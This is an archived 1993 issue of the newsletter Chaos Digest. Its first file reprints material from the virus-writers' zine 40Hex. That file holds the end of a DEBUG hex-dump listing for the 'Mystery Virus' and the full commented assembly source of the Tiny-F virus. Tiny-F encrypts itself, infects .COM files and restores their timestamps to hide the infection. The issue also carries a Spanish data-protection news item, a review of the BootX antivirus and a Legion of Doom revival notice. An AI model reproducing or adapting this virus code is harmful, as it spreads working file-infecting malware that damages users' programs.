home *** CD-ROM | disk | FTP | other *** search
/ HPAVC / HPAVC CD-ROM.iso / KAOS1_40.ZIP / KAOS1-40
Text File  |  1993-06-02  |  28KB  |  694 lines

  1. Chaos Digest              Vendredi 28 Mai 1993        Volume 1 : Numero 40
  2.                              ISSN 1244-4901
  3.  
  4.        Editeur: Jean-Bernard Condat (jbcondat@attmail.com)
  5.        Archiviste: Yves-Marie Crabbe
  6.        Co-Redacteurs: Arnaud Bigare, Stephane Briere
  7.  
  8. TABLE DES MATIERES, #1.40 (28 Mai 1993)
  9. File 1--40H VMag Issue 1 Volume 3 #008(2)-010 (reprint)
  10. File 2--Agence de Protection des Donnees Espagnoles (creation)
  11. File 3--"BootX" pour Amiga (critique)
  12. File 4--Nouveau rebondissement de _The Legion of Doom_ (news)
  13.  
  14. Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are
  15. available at no cost by sending a message to:
  16.                 linux-activists-request@niksula.hut.fi
  17. with a mail header or first line containing the following informations:
  18.                     X-Mn-Admin: join CHAOS_DIGEST
  19.  
  20. The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070)
  21. or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], B.P.
  22. 155, 93404 St-Ouen Cedex, France.  He is a member of the EICAR and EFF (#1299)
  23. groups.
  24.  
  25. Issues of ChaosD can also be found from the ComNet in Luxembourg BBS (+352)
  26. 466893.  Back issues of ChaosD can be found on the Internet as part of the
  27. Computer underground Digest archives. They're accessible using anonymous FTP:
  28.  
  29.         * kragar.eff.org [192.88.144.4] in /pub/cud/chaos
  30.         * uglymouse.css.itd.umich.edu [141.211.182.53] in /pub/CuD/chaos
  31.         * halcyon.com [192.135.191.2] in /pub/mirror/cud/chaos
  32.         * ftp.cic.net [192.131.22.2] in /e-serials/alphabetic/c/chaos-digest
  33.         * ftp.ee.mu.oz.au [128.250.77.2] in /pub/text/CuD/chaos
  34.         * nic.funet.fi [128.214.6.100] in /pub/doc/cud/chaos
  35.         * orchid.csv.warwick.ac.uk [137.205.192.5] in /pub/cud/chaos
  36.  
  37. CHAOS DIGEST is an open forum dedicated to sharing French information among
  38. computerists and to the presentation and debate of diverse views. ChaosD
  39. material may be reprinted for non-profit as long as the source is cited.
  40. Some authors do copyright their material, and they should be contacted for
  41. reprint permission.  Readers are encouraged to submit reasoned articles in
  42. French, English or German languages relating to computer culture and
  43. telecommunications.  Articles are preferred to short responses.  Please
  44. avoid quoting previous posts unless absolutely necessary.
  45.  
  46. DISCLAIMER: The views represented herein do not necessarily represent
  47.             the views of the moderators. Chaos Digest contributors
  48.             assume all responsibility for ensuring that articles
  49.             submitted do not violate copyright protections.
  50.  
  51. ----------------------------------------------------------------------
  52.  
  53. Date: Tue May 11 09:24:40 PDT 1993
  54. From: 0005847161@mcimail.com (American_Eagle_Publication_Inc. )
  55. Subject: File 1--40H VMag Issue 1 Volume 3 #008(2)-010 (reprint)
  56.  
  57. [suite du listing du "Mystery Virus":]
  58.  
  59.  
  60. e 0530  22 00 8A E0 E8 1D 00 3D 6F 63 74 0C 3D 78 65 75
  61. e 0540  10 E8 10 00 3C 65 EB 09 E8 09 00 3C 6D EB 02 FE
  62. e 0550  C0 5E 58 C3 AC 3C 43 72 06 3C 59 73 02 04 20 C3
  63. e 0560  9C 80 FC 68 2E FF 1E 91 07 C3 1E 06 56 57 50 53
  64. e 0570  51 52 8C DE 33 C0 8E D8 C4 06 90 00 06 50 C7 06
  65. e 0580  90 00 26 03 8C 0E 92 00 8E DE 33 C9 B8 00 43 E8
  66. e 0590  CE FF 8B D9 80 E1 FE 3A CB 74 07 B8 01 43 E8 BF
  67. e 05A0  FF F9 9C 1E 52 53 B8 02 3D E8 B4 FF 72 0A 8B D8
  68. e 05B0  E8 26 00 B4 3E E8 A8 FF 59 5A 1F 9D 73 06 B8 01
  69. e 05C0  43 E8 9C FF 33 C0 8E D8 8F 06 90 00 8F 06 92 00
  70. e 05D0  5A 59 5B 58 5F 5E 07 1F C3 0E 1F 0E 07 BA 95 07
  71. e 05E0  B9 18 00 B4 3F E8 78 FF 33 C9 33 D2 B8 02 42 E8
  72. e 05F0  6E FF 89 16 AF 07 3D 00 0B 83 DA 00 72 6C A3 AD
  73. e 0600  07 81 3E 95 07 4D 5A 75 17 A1 9D 07 03 06 AB 07
  74. e 0610  E8 91 01 03 06 A9 07 83 D2 00 8B CA 8B D0 EB 15
  75. e 0620  80 3E 95 07 E9 75 44 8B 16 96 07 81 C2 03 01 72
  76. e 0630  3A FE CE 33 C9 B8 00 42 E8 25 FF 05 00 07 90 83
  77. e 0640  D2 00 3B 06 AD 07 75 23 3B 16 AF 07 75 1D BA B1
  78. e 0650  07 8B F2 B9 EF 02 B4 3F E8 05 FF 72 0E 3B C8 75
  79. e 0660  0A BF 49 00 AC AE 75 03 E2 FA C3 33 C9 33 D2 B8
  80. e 0670  02 42 E8 EB FE A3 45 07 89 16 47 07 81 3E 95 07
  81. e 0680  4D 5A 74 0A 05 95 09 90 83 D2 00 74 19 C3 8B 16
  82. e 0690  AD 07 F6 DA 83 E2 0F 33 C9 B8 01 42 E8 C1 FE A3
  83. e 06A0  AD 07 89 16 AF 07 B8 00 57 E8 B4 FE 9C 51 52 81
  84. e 06B0  3E 95 07 4D 5A 74 05 B8 00 01 EB 07 A1 A9 07 8B
  85. e 06C0  16 AB 07 2E C7 06 47 00 00 07 BF 3A 07 AB 8B C2
  86. e 06D0  AB A1 A5 07 AB A1 A3 07 AB BE 95 07 A4 A5 33 D2
  87. e 06E0  B9 49 07 90 B4 40 E8 77 FE 72 27 33 C8 75 23 8B
  88. e 06F0  D1 B8 00 42 E8 69 FE 81 3E 95 07 4D 5A 74 15 C6
  89. e 0700  06 95 07 E9 A1 AD 07 05 46 00 A3 96 07 B9 03 00
  90. e 0710  EB 57 EB 5D E8 8A 00 F7 D0 F7 D2 40 75 01 42 03
  91. e 0720  06 AD 07 13 16 AF 07 B9 10 00 F7 F1 C7 06 A9 07
  92. e 0730  49 00 A3 AB 07 05 72 00 A3 A3 07 C7 06 A5 07 00
  93. e 0740  01 81 06 AD 07 49 07 83 16 AF 07 00 A1 AD 07 25
  94. e 0750  FF 01 A3 97 07 9C A1 AE 07 D0 2E B0 07 D1 D8 9D
  95. e 0760  74 01 40 A3 99 07 B9 18 00 BA 95 07 B4 40 E8 EF
  96. e 0770  FD 5A 59 9D 72 06 B8 01 57 E8 E4 FD C3 1E E8 07
  97. e 0780  00 C6 06 00 00 4D 1F C3 50 53 B4 62 E8 D1 FD 8C
  98. e 0790  C8 48 4B 8E DB F9 13 1E 03 00 3B D8 72 F5 5B 58
  99. e 07A0  C3 A1 9D 07 BA 10 00 F7 E2 C3 FE FF FD 00 FE 40
  100. e 07B0  75 73 73 72 40 40 40 40 40 76 89 92 95 73 8F 86
  101. e 07C0  94 40 40 48 83 49 40 40 96 51 4E 40 51 59 59 50
  102. e 07D0  40 FD 00 FE FC FD 00 4A 01 03 01 B8 01 0B 01 4A
  103. e 07E0  01 06 01 72 01 01 02 9F 01 09 01 15 01 02 02 15
  104. e 07F0  01 03 02 72 01 08 01 4A 01 05 02 26 01 01 01 4A
  105. e 0800  01 08 02 15 01 03 02 15 01 03 03 26 01 08 02 26
  106. e 0810  01 05 01 4A 01 01 02 72 01 08 01 72 01 04 01 72
  107. e 0820  01 04 00 72 01 08 02 9F 01 06 02 B8 01 01 02 EE
  108. e 0830  01 0F FF FF FF 00 00 00 01 00 00 00 00 00 00 00
  109. e 0840  01 3A 16 D8 8E C3 8E B8 00 4C 05 00 00 00 1A 1A
  110.  
  111. rcx
  112. 74e
  113. w
  114. q
  115.  
  116. +++++
  117.  
  118.  40Hex Issue 3                                                      0009
  119.  
  120.                             The Tiny-F Virus
  121.  
  122.        In our first issue we gave you the source for the Tiny-B virus.
  123.        Well some people don't quit.
  124.  
  125.        After months of struggling Psyco-genius decided to give
  126.        his attempts to make this a good virus over to someone who
  127.        knows what he's doning.
  128.  
  129.        So Dark (mastered assembler in one week) Angel did some mods
  130.        and here we have it.
  131.  
  132. -------------------------------------------------------------------------
  133. tinyv   SEGMENT BYTE PUBLIC 'code'
  134.         ASSUME  CS:tinyv, DS:tinyv, SS:tinyv, ES:tinyv
  135.  
  136.         ORG     100h
  137.  
  138. DOS     EQU     21h
  139.  
  140. start:  JMP     pgstart
  141. exlbl:  db      0CDh, 20h, 7, 8, 9
  142. pgstart:CALL    tinyvir
  143. tinyvir:
  144.         POP     SI                      ; get SI for storage
  145.         SUB     SI,offset tinyvir       ; reset SI to virus start
  146.         MOV     BP,[SI+blnkdat]         ; store SI in BP for return
  147.         ADD     BP, OFFSET exlbl
  148.         CALL    endecrpt
  149.         JMP     SHORT realprog
  150.  
  151. ;------------------------------------------------------------------------
  152. ;nonencrypted subroutines start here
  153. ;------------------------------------------------------------------------
  154.  
  155. ;PCM's encryption was stupid, mine is better - Dark Angel
  156. endecrpt:
  157. ;Only need to save necessary registers - Dark Angel
  158.         PUSH    AX                      ; store registers
  159.         PUSH    BX
  160.         PUSH    CX
  161.         PUSH    SI
  162. ;New, better, more compact encryption engine
  163.         MOV     BX, [SI+EN_VAL]
  164.         ADD     SI, offset realprog
  165.         MOV     CX, endenc - realprog
  166.         SHR     CX, 1
  167.         JNC     start_encryption
  168.         DEC     SI
  169. start_encryption:
  170.         MOV     DI, SI
  171. encloop:
  172.         LODSW                           ;DS:[SI] -> AX
  173.         XOR     AX, BX
  174.         STOSW
  175.         LOOP    encloop
  176.  
  177.         POP     SI                      ;restore registers
  178.         POP     CX
  179.         POP     BX
  180.         POP     AX
  181.         RET
  182. ;-----end of encryption routine
  183. nfect:
  184.         CALL    endecrpt
  185.         MOV     [SI+offset endprog+3],AX;point to data
  186.         MOV     AH,40H                  ;write instruction
  187.         LEA     DX,[SI+0105H]           ;write buffer loc    |
  188.         MOV     CX,offset endprog-105h  ;(size of virus)  --\|/--
  189.         INT     DOS                     ;do it!
  190.         PUSHF
  191.         CALL    endecrpt
  192.         POPF
  193.         JC      outa1                    ;error, bug out
  194.         RET
  195. outa1:
  196.         JMP     exit
  197.  
  198.  
  199. ;------------------------------------------------------------------------
  200. ;    Unencrypted routines end here
  201. ;------------------------------------------------------------------------
  202. realprog:
  203.         CLD                             ;forward direction for string ops
  204. ;Why save DTA?  This part killed.  Saves quite a few bytes.  Dark Angel
  205. ;Instead, set DTA to SI+ENDPROG+131h
  206.         MOV     AH, 1Ah                 ;Set DTA
  207.         LEA     DX, [SI+ENDPROG+131h]   ; to DS:DX
  208.         INT     21h
  209.  
  210.         LEA     DX,[SI+fspec]           ;get filespec (*.COM)
  211.         XOR     CX, CX                  ;       ||   (clear regs)
  212.         MOV     AH,4EH                  ;       ||   (find files)
  213. mainloop:                               ;      \||/
  214.         INT     DOS                     ;   ----\/----
  215.         JC      hiccup                  ;no more files found, terminate virus
  216. ;Next part had to be changed to account for new DTA address - Dark Angel
  217.         LEA     DX, [SI+ENDPROG+131h+30];set file name pointer
  218.                                         ;(offset 30 is DTA filename start)
  219.         MOV     AX,3D02H                ;open file
  220.         INT     DOS                     ;do it!
  221.         MOV     BX,AX                   ;move file handle to BX
  222.         MOV     AH,3FH                  ;read file
  223.         LEA     DX,[SI+endprog]         ;load end of program (as buffer pntr)
  224.         MOV     DI,DX                   ;set Dest Index to area for buffer
  225.         MOV     CX,0003H                ;read 3 bytes
  226.         INT     DOS                     ;do it!
  227.         CMP     BYTE PTR [DI],0E9H      ;check for JMP at start
  228.         JE      infect                  ;If begins w/JMP, Infect
  229. nextfile:
  230.         MOV     AH,4FH                  ;set int 21 to find next file
  231.         JMP     mainloop                ;next file, do it!
  232. hiccup: JMP     exit
  233. infect:
  234.         MOV     AX,5700h                ;get date function
  235.         INT     DOS                     ;do it!
  236.         PUSH    DX                      ;store date + time
  237.         PUSH    CX
  238.         MOV     DX,[DI+01H]             ;set # of bytes to move
  239.         MOV     [SI+blnkdat],DX         ; "  " "    "   "   "
  240. ;Tighter Code here - Dark Angel
  241.         XOR     CX,CX                   ; "  " "    "   "   " (0 here)
  242.         MOV     AX,4200H                ;move file
  243.         INT     DOS                     ;do it!
  244.         MOV     DX,DI                   ;set dest index to area for buffer
  245.         MOV     CX,0002H                ;two bytes
  246.         MOV     AH,3FH                  ;read file
  247.         INT     DOS                     ;do it!
  248.         CMP     WORD PTR [DI],0807H     ;check for infection
  249.         JE      nextfile                ;next file if infected
  250. getaval:                                ;encryption routine starts here
  251. ;My modifications here - Dark Angel
  252.         MOV     AH, 2Ch                 ;DOS get TIME function
  253.         INT     DOS                     ;do it!
  254.         OR      DX, DX                  ;Is it 0?
  255.         JE      getaval                 ;yeah, try again
  256.         MOV     word ptr [si+offset en_va], DX ; Store it
  257. ;Tighter code here - Dark Angel
  258.         XOR     DX,DX                   ;clear regs
  259.         XOR     CX,CX                   ;  "    "
  260.         MOV     AX,4202H                ;move file pointer
  261.         INT     DOS                     ;do it!
  262.         OR      DX,DX                   ;new pointer location 0?
  263.         JNE     nextfile                ;if no then next file
  264.         CMP     AH,0FEH                 ;new pointer loc too high?
  265.         JNC     nextfile                ;yes, try again
  266.         CALL    nfect
  267.         MOV     AX,4200H                ;move pointer
  268.         XOR     CX, CX                  ;clear reg
  269.         MOV     DX,OFFSET 00001         ;where to set pointer
  270.         INT     DOS                     ;do it!
  271.         MOV     AH,40H                  ;write to file
  272.         LEA     DX,[SI+offset endprog+3];write data at SI+BUFFER
  273.         MOV     CX,0002H                ;two bytes (the JMP)
  274.         INT     DOS                     ;do it!
  275.         MOV     AX,5701h                ;store date
  276.         POP     CX                      ;restore time
  277.         POP     DX                      ;restore date
  278.         INT     DOS                     ;do it!
  279. exit:
  280.         MOV     AH,3EH                  ;close file
  281.         INT     DOS                     ;do it!
  282.  
  283. ;Return DTA to old position - Dark Angel
  284.  
  285.         MOV     AH, 1Ah                 ;Set DTA
  286.         MOV     DX, 80h                 ; to PSP DTA
  287.         INT     21h
  288.  
  289.         JMP     BP
  290.  
  291. ;------------------------------------------------------------------------
  292. ;encrypted data goes here
  293. ;------------------------------------------------------------------------
  294.  
  295. fspec   LABEL   WORD
  296.         DB      '*.COM',0
  297. nondata DB      'Tiny-F version 1.1'    ;Program identification
  298.         DB      '%$!"&%',=)%&-!'        ;author identification
  299.         DB      'Released 10-19-91'     ;release date
  300. endenc  LABEL   BYTE                    ;end of encryption zone
  301. ;------------------------------------------------------------------------
  302. ;nonencrypted data goes anywhere after here
  303. ;------------------------------------------------------------------------
  304.  
  305. blnkdat LABEL   WORD
  306.         DW      0000H
  307.  
  308. ;Only en_val is needed now because of new encryption mechanism
  309. en_val  DW      0h
  310.  
  311. endprog LABEL   WORD
  312. tinyv   ENDS
  313.         END     start
  314.  
  315. +++++
  316.  
  317. 40Hex Issue 3                                                       0010
  318.  
  319.                               In Closing
  320.  
  321.      Well that will do it for this issue.  Sorry it took so damn long,
  322.      but screw it.
  323.  
  324.      Next issue we will have more articals, more viruses, and all that.
  325.  
  326.      We were supposed to have an interview with an Amiga virus writer
  327.      this issue but we just couldn't get it in time.  Also we were
  328.      planning an interview with John Mcafee, but the same story there.
  329.  
  330.      Also next issue, I hope to have the Bob Ross virus, from the
  331.      twisted mind of Dark Angel.  And If I can find it, the DIR-2 virus
  332.      and The Teqeulla Virus, so I can't spell.
  333.  
  334.      See you then.
  335.  
  336. ------------------------------
  337.  
  338. Date: Sun, 16 May 93 21:01:10 -0100
  339. From: rfcalvo@guest2.atimdr.es (Rafael Fernandez Calvo )
  340. Subject: File 2--Agence de Protection des Donnees Espagnoles (creation)
  341.  
  342.  
  343.     CCCCC  LL     II
  344.    CC      LL     II
  345.    CC      LL     II    --  N E W S   FROM   S P A I N  --- May 16, 1993
  346.     CCCCC  LLLLLL II
  347.  
  348.  COMMISSION for LIBERTIES
  349.  and INFORMATICS (*)
  350.  
  351.  
  352.        DATA PROTECTION AGENCY CREATED BY THE SPANISH COVERNMENT
  353.        ++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  354.  
  355.      The Government of the Kingdom of Spain approved on May 4th, 1993 the
  356. Estatute of the Data Protection Agency (Agencia de Proteccion de Datos), the
  357. body that, according to the Law on Protection of Personal Data (whose acronym
  358. is LORTAD) approved by the Spanish Parliament in October 1992, will watch
  359. over proper observance of this law.
  360.  
  361.      According to its Estatute, the Agency is an independent body, headed
  362. by its Director, who will be nominated by the Government among the members
  363. of the Consultive Council. The Council will have nine members, elected for
  364. a period of four years by the Congress, the Senate, the Ministry of Justice,
  365. the Regional Governments, the Federation of Provinces and Cities, the Royal
  366. Academy of History, the Council of Universities, the Council of Consumers and
  367. Users, and the Council of Chambers of Commerce, respectively. Trade Unions
  368. and DP Professionals will not be represented in spite of the proposals of
  369. CLI, that also submitted one of having the Director nominated by the Council
  370. itself instead of by the Government in order to insure the independence of
  371. the Agency
  372.  
  373.      Among the powers of the Agency are those of dictating fines of up to
  374. 1 Million US $ and sealing personal data files of companies and entities that
  375. infringe the law. The Agency will the body representing Spain in the European
  376. Community, the Council of Europe and the Schengen Agreement on free
  377. circulation of people within the EC borders for all the matters regarding
  378. personal data protection.
  379.  
  380.      The Data Protection Agency will have to be created in the middle of a
  381. sharp campaign for Congress and Parliament in elections that will be held on
  382. June 6, whose outcome, according to the polls, will be very tight between the
  383. ruling Socialist Party and the center-right People's Party, with a well
  384. placed third party: United Left (a communist-led coalition). These two
  385. parties gave strong support to the position of CLI with regard to the LORTAD
  386. during its discussion in Congress and Senate.
  387.  
  388.       CLI achieved in February its goal of seeing the appeal against the
  389. Personal Data Law put before the Constitutional Court of Spain by the
  390. Ombudsman, the Peoples' Party and the Regional Parliament of Catalonia. The
  391. appeals address basically the concerns of CLI that the law establishes a lot
  392. of unjustified exceptions in favour of Government with regard to the rights
  393. that citizens have about their personal data. Even though the appeals don't
  394. interrupt the application of the law since Jan. 31, they leave the door open
  395. to its modification in the sense promoted by CLI.
  396.  
  397.      Let's recall that Spain is one of the very few countries whose Carta
  398. Magna foresees the dangers that can stem from misuse of Information
  399. Technology. In fact, its Constitution establishes that a "law will limit the
  400. use of Information Technologies in order to protect citizens' honour and
  401. their personal and family privacy as well as the unrestricted exercise of
  402. their rights" (article 18.4).
  403.  
  404.       The position of CLI about the LORTAD can be summarized as follows:
  405.  
  406. - The law does not fulfill the expectations arisen, although it is a step
  407. forward in comparison with the current situation of "allegality" that has
  408. been a constant source of severe abuse against privacy;
  409.  
  410. - The good side of the law is the regulation of personal data files
  411. in the hands of companies and private entities. Citizens will have
  412. wide rights to access, modification and cancellation of this kind of
  413. records.
  414.  
  415. - The bad side stems from the following facts:
  416.  
  417.    a) The bill gives excessive and uncontrolled power to Policy Forces
  418.    over collection and computerization of highly sensitive data: ideology,
  419.    religion, beliefs, racial origin, health and sexual orientation.
  420.  
  421.    b) Computerized personal data records in the hands of all branches
  422.    of Public Administrations will be in many cases excluded from the rights
  423.    (access, modification, cancellation) given to citizens with regard to
  424.    the same kind of data in the hands of private companies.
  425.  
  426.    c) The Data Protection Agency that will watch over proper observance of
  427.    the law will have scarce autonomy from the Government, that will
  428.    nominate and dismiss its Director.
  429.  
  430.  
  431. * SOME WORDS ABOUT CLI
  432.  
  433.      The --Commission for Liberties and Informatics, CLI-- is an independent
  434. and pluralistic organization that was officially constituted in April '91.
  435.  
  436.       Its mission is to "promote the development and protection of citizens'
  437. rights, specially privacy, against misuse of Information Technologies".
  438.  
  439.      As of May '93, CLI is composed by nine organizations, with a joint
  440. membership of about 3,000,000 people. They cover a very wide spectrum of
  441. social interest groups: associations of computer professionals, judges, civil
  442. rights leagues, trade unions, consumers groups, direct marketing industry,
  443. etc.
  444.  
  445.      CLI is confederated with similar bodies created in some other Spanish
  446. Regions such as Valencia, Basque Country and Catalonia, and has fluid
  447. working relationships with many public and private Data Protection bodies
  448. and entities all over the world, including CNIL, CPSR and Privacy
  449. International.
  450.  
  451.      CLI has its headquarters in:
  452.  
  453. Padilla 66, 3 dcha.
  454. E-28006 Madrid, Spain
  455.  
  456. Phone: (34-1) 402 9391
  457. Fax: (34-1) 309 3685
  458. E-mail: rfcalvo@guest2.atimdr.es
  459.  
  460. ------------------------------
  461.  
  462. Date: Sun May 23 00:06:00 -0600 1993
  463. From: roberts@decus.arc.ab.ca ("Rob Slade, DECrypt Editor, VARUG NLC rep )
  464. Subject: File 3--"BootX" pour Amiga (critique)
  465. Copyright: Robert M. Slade, 1993
  466.  
  467.  
  468.                                Comparison Review
  469.  
  470. Company and product:
  471.  
  472. Peter Stuer
  473. Kauwlei 21
  474. B-2550 Kontich
  475. Belgium
  476. Peter.Stuer@p7.f603.n292.z2.FidoNet.Org
  477. BootX 5.23
  478.  
  479. Summary: Scanner and disinfector with some operation restriction
  480.  
  481. Cost: unknown
  482.  
  483. Rating (1-4, 1 = poor, 4 = very good)
  484.       "Friendliness"
  485.             Installation
  486.             Ease of use
  487.             Help systems
  488.       Compatibility
  489.       Company
  490.             Stability
  491.             Support
  492.       Documentation
  493.       Hardware required
  494.       Performance
  495.       Availability
  496.       Local Support
  497.  
  498. General Description:
  499.  
  500.                   Comparison of features and specifications
  501.  
  502. User Friendliness
  503.  
  504. Installation
  505.  
  506. Both automated and manual installation is provided.
  507.  
  508. Ease of use
  509.  
  510. BootX can be run from either the CLI or the Workbench.  Once invoked it can
  511. be made the "foreground task" by a "hot key" call.  The program is menu
  512. driven, with a comprehensive range of actions.
  513.  
  514. Help systems
  515.  
  516. Can use the AmigaGuide.library function if available.
  517.  
  518. Compatibility
  519.  
  520. Unknown but unlikely to cause problems.  Some problems are noted with
  521. Enforcer.  Will work with certain compression programs to check compressed
  522. executables.
  523.  
  524. Company Stability
  525.  
  526. Unknown, but this is currently one of the major recommended Amiga antivirals.
  527. The program is distributed as freeware.
  528.  
  529. Company Support
  530.  
  531. The author's mail and email addresses are given, as well as contact info for
  532. "Safe Hex International".
  533.  
  534. Documentation
  535.  
  536. Simple but straightforward directions on the installation and running of the
  537. program.  There is little general discussion of viral programs and operation,
  538. but some is mentioned in conjunction with certain features of the program.
  539. Unusually for a shareware/freeware package there is an extensive glossary
  540. which may provide some background.  (I learned, for instance, that a
  541. "linkvirus" is the term for what is more generally known as a program or file
  542. infecting virus).
  543.  
  544. System Requirements
  545.  
  546. 512K RAM or higher and at least one disk drive.  KickStart v2.04 and
  547. ReqTools.library v38 or higher.  Workbench v2.1 or higher to use the language
  548. independence utility and v3.0 or higher to use the AmigaGuide.library help
  549. feature.  Various decompression programs may be needed to check compressed
  550. executables.
  551.  
  552. Performance
  553.  
  554. Unknown at this time due to lack of a test suite.  Currently one of the most
  555. highly recommended Amiga antivirals.
  556.  
  557. Local Support
  558.  
  559. The author is reachable via Fidonet and Internet mail.
  560.  
  561. Support Requirements
  562.  
  563. Users experienced with using shareware should have no problems.
  564.  
  565. ==============
  566. Vancouver      ROBERTS@decus.ca         | Slade's Law of Computer
  567. Institute for  Robert_Slade@sfu.ca      |        Literacy:
  568. Research into  rslade@cue.bc.ca         |   - There is no such thing
  569. User           p1@CyberStore.ca         |     as "computer illiteracy";
  570. Security       Canada V7K 2G6           |     only illiteracy itself.
  571.  
  572.  
  573. [ChaosD: Voici les commentaires de l'auteur de ce programme sur ce papier:]
  574.  
  575. Date: Wed May 26 17:58:49 PDT 1993
  576. From: Peter.Stuer@p7.f603.n292.z2.fidonet.org (Peter Stuer )
  577.  
  578. Hum...seems you're a bit behind on the news. I stopped developing BootX last
  579. March because of lack of time.
  580.  
  581.   /~\
  582.  C oo
  583.  _( ^)
  584. /   ~\  Peter Stuer.
  585.  
  586. --
  587. uucp: uunet!m2xenix!puddle!2!292!603.7!Peter.Stuer
  588. Internet: Peter.Stuer@p7.f603.n292.z2.fidonet.org
  589.  
  590. ------------------------------
  591.  
  592. Date: Tue, 25 May 1993 10:32:28 -0400
  593. From: tdc@zooid.guild.org (TDC )
  594. Subject: File 4--Nouveau rebondissement de _The Legion of Doom_ (news)
  595.  
  596.  
  597.                         Final Anouncement
  598.  
  599.                                The
  600.                                LOD
  601.                           Legion of Doom
  602.                              Is Back!
  603.  
  604. No that has not been a mis-print... the LOD has returned!  The world's
  605. greatest hacking group has formally been reinstated to bring back dignity
  606. and respect to a scene that has rapidly deteriorated since its departure.
  607.  
  608. The LOD is not just another "Group" that goes around with upper/lower case
  609. names, trading in PBX's and VMB's and wouldn't know COSMOS if it hit them
  610. over the head.  It's a sad day indeed when the term hacker is used to refer
  611. to every code and credit card abusing rodent in the nation.  We intend
  612. through our presence and many innovative projects, not to mention the
  613. technical journal to restore the original values of technical exploration
  614. and knowledge that the term hacker was founded on.
  615.  
  616. The LOD imbodies the pinnacle of understanding that comes from relentless
  617. exploration of the "system" backwards and forwards.  It is an organization
  618. dedicated to understanding the world's computer and telephone networks.
  619. Enabling everyone to progress forward in technology.  The accumulated product
  620. of this--the Technical Journals, full of information unavailible anywhere
  621. except from telco manuals represents something to valuable to lose.
  622.  
  623. [...] This will be the primary of purpose the new, revived LOD - the assembly
  624. and release of a Technical Journal.  The previous four issues, now several
  625. years old BADLY need updating.
  626.  
  627. The Journal will rely heavily on reader submitted articles and information,
  628. so anything you wish to contribute would be GREATLY appreciated.  Acceptable
  629. submitions would include ORIGINAL "how-to- guides" on various systems,
  630. security discussions, technical specifications and doccumentation.  Computer
  631. and telephone related subjects are not the only ones acceptable.  If you
  632. remember the former journals had articles concerning interrogation, physical
  633. security among others.
  634.  
  635. The next LOD Technical Journal will comprise almost entirely of freelance or
  636. reader submitted articles. So without YOUR contributions it can not proceed!
  637. Solid progress is being made in the next Technical Journal by both free-
  638. lancers and group members.  But bigger is better, as you can never have too
  639. much information or instruction.
  640.  
  641. SEND UP ALL ORIGINAL ARTICLES FOR PUBLICATION!!!
  642.  
  643. If you wish to hold the wonderful honour of being an LOD Member  (Won't
  644. this look good on the resume), you may apply by contacting us.  The
  645. qualifications should need no elaboration.
  646.  
  647. Regardless of the unbased claims made by others, the LOD is as strong and
  648. capable as it ever was.  Legendary groups like the LOD are not born this way.
  649. They take time to form, and restarting almost from scratch almost three years
  650. later, time is obviously needed.  We say to all the skeptics, hang on to your
  651. premature judgements until we're on our feet and judge by actions not
  652. opinions.
  653.  
  654. To set the record straight once and for all, and to convince the skeptics
  655. that doubt the validity of all this, the Legion of Doom >IS< BACK.  Next
  656. month, a full-fledged Technical Journal will be widely released, and you're
  657. doubts and questions will be once and for all answered with uncontestable
  658. fact.
  659.  
  660. In addition to needing articles for the upcoming Journals, some sites on the
  661. net to aid in distribution would also be welcomed.  Someone willing to donate
  662. the resources necessary to operate a subscription type mailing list service
  663. is also needed.  Send all offers and articles to our email account or PO Box.
  664.  
  665. Reach us at:            tdc@zooid.guild.org
  666.  
  667. Or by blindingly quick, faster than light mail at:
  668.  
  669.                                 LOD
  670.                             P.O. Box 104
  671.                          4700 Keele Street
  672.                        North York, ON  M3J-1P3
  673.  
  674. Closing date for article submittions to the LOD Technical Journal
  675. Number 5 is: Monday 14 June, 1993.
  676.  
  677. Release date: Friday 18 June, 1993.
  678.  
  679. Since we have no monetary or contractual obligation to anyone, these dates
  680. are of course tentative. But since or at least initially we will rely almost
  681. entirely on reader submitions a date is needed to get potential writers into
  682. gear.
  683.  
  684. Note that the LOD does not engage or condone illegal or criminal activities.
  685. This would cover, but is not limited to, theft of long distance services,
  686. credit fraud or data destruction/alteration.
  687.  
  688. Lord Havoc
  689.  
  690. ------------------------------
  691.  
  692. End of Chaos Digest #1.40
  693. ************************************
  694.